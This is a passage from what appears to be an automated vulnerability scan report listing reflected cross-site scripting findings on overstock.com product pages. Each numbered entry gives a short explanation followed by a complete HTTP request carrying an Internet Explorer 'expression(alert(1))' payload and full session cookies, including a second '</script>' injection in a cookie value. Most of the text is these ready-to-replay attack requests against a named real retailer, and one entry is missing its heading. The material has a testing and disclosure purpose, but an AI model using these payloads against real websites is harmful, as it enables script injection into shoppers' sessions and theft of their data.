GET /Home-Garden/Egyptian-Cotton-300-Thread-Count-Sheet-Set/4662568/product.html?fac04"style%3d"x%3aexpression(alert(1))"9b2ad2d9764=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.210. http://www.overstock.com/Home-Garden/Egyptian-Cotton-600-Thread-Count-3-piece-Duvet-Cover-Set/4254511/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8b2"style%3d"x%3aexpression(alert(1))"815a4ff8229 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb8b2"style="x:expression(alert(1))"815a4ff8229 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-600-Thread-Count-3-piece-Duvet-Cover-Set/4254511/product.html?fb8b2"style%3d"x%3aexpression(alert(1))"815a4ff8229=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.211. http://www.overstock.com/Home-Garden/Egyptian-Cotton-650-Thread-Count-Solid-Sheet-Set/3308477/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d08f"style%3d"x%3aexpression(alert(1))"f4480409bf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d08f"style="x:expression(alert(1))"f4480409bf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-650-Thread-Count-Solid-Sheet-Set/3308477/product.html?8d08f"style%3d"x%3aexpression(alert(1))"f4480409bf4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.212. http://www.overstock.com/Home-Garden/Egyptian-Cotton-Sateen-1000-Thread-Count-6-piece-Sheet-Set/3478878/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2d74"style%3d"x%3aexpression(alert(1))"96fdcd911cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2d74"style="x:expression(alert(1))"96fdcd911cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-Sateen-1000-Thread-Count-6-piece-Sheet-Set/3478878/product.html?d2d74"style%3d"x%3aexpression(alert(1))"96fdcd911cb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.213. http://www.overstock.com/Home-Garden/Egyptian-Cotton-Sateen-600-Thread-Count-Sheet-Set/1858550/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3d64"style%3d"x%3aexpression(alert(1))"78312172e10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3d64"style="x:expression(alert(1))"78312172e10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-Sateen-600-Thread-Count-Sheet-Set/1858550/product.html?b3d64"style%3d"x%3aexpression(alert(1))"78312172e10=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.214. http://www.overstock.com/Home-Garden/Egyptian-Cotton-Terry-Bath-Robe/2994950/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f13"style%3d"x%3aexpression(alert(1))"d734b36adbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58f13"style="x:expression(alert(1))"d734b36adbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-Terry-Bath-Robe/2994950/product.html?58f13"style%3d"x%3aexpression(alert(1))"d734b36adbd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.215. http://www.overstock.com/Home-Garden/Ellsworth-Espresso-6-drawer-Chest/3912581/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d260e"style%3d"x%3aexpression(alert(1))"67747ff79cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d260e"style="x:expression(alert(1))"67747ff79cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Ellsworth-Espresso-6-drawer-Chest/3912581/product.html?d260e"style%3d"x%3aexpression(alert(1))"67747ff79cb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 148a0"style%3d"x%3aexpression(alert(1))"2175c7a4b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 148a0"style="x:expression(alert(1))"2175c7a4b13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Emi-Ebony-4-in-1-Crib/3000545/product.html?148a0"style%3d"x%3aexpression(alert(1))"2175c7a4b13=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.217. http://www.overstock.com/Home-Garden/Essex-3-piece-Quilt-Set/2449121/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e9d"style%3d"x%3aexpression(alert(1))"55bd4eb2435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1e9d"style="x:expression(alert(1))"55bd4eb2435 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Essex-3-piece-Quilt-Set/2449121/product.html?e1e9d"style%3d"x%3aexpression(alert(1))"55bd4eb2435=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.218. http://www.overstock.com/Home-Garden/Euro-Pro-Shark-V1310-Bagless-Pet-Care-Upright-Vacuum-Refurbished/4678538/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a522"style%3d"x%3aexpression(alert(1))"65da3d73aa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a522"style="x:expression(alert(1))"65da3d73aa4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Euro-Pro-Shark-V1310-Bagless-Pet-Care-Upright-Vacuum-Refurbished/4678538/product.html?5a522"style%3d"x%3aexpression(alert(1))"65da3d73aa4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.219. http://www.overstock.com/Home-Garden/Executive-Ergonomic-Five-star-Office-Chair/3656969/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6d5f"style%3d"x%3aexpression(alert(1))"d0f7111be91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6d5f"style="x:expression(alert(1))"d0f7111be91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Executive-Ergonomic-Five-star-Office-Chair/3656969/product.html?d6d5f"style%3d"x%3aexpression(alert(1))"d0f7111be91=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.220. http://www.overstock.com/Home-Garden/Executive-Style-Computer-Desk/2605128/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18d1"style%3d"x%3aexpression(alert(1))"2befb5f640a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a18d1"style="x:expression(alert(1))"2befb5f640a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Executive-Style-Computer-Desk/2605128/product.html?a18d1"style%3d"x%3aexpression(alert(1))"2befb5f640a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.221. http://www.overstock.com/Home-Garden/Faux-Silk-Luster-Crushed-Curtain-Panel-Pair/3647403/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca410"style%3d"x%3aexpression(alert(1))"2b1193729ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca410"style="x:expression(alert(1))"2b1193729ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Faux-Silk-Luster-Crushed-Curtain-Panel-Pair/3647403/product.html?ca410"style%3d"x%3aexpression(alert(1))"2b1193729ee=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.222. http://www.overstock.com/Home-Garden/Five-drawer-Storage-Cabinet/3126570/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888bb"style%3d"x%3aexpression(alert(1))"780c10eae81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 888bb"style="x:expression(alert(1))"780c10eae81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Five-drawer-Storage-Cabinet/3126570/product.html?888bb"style%3d"x%3aexpression(alert(1))"780c10eae81=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.223. http://www.overstock.com/Home-Garden/Five-tier-Antique-Black-Ladder-Shelf/2041992/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4024f"style%3d"x%3aexpression(alert(1))"bf6a2d0c452 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4024f"style="x:expression(alert(1))"bf6a2d0c452 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
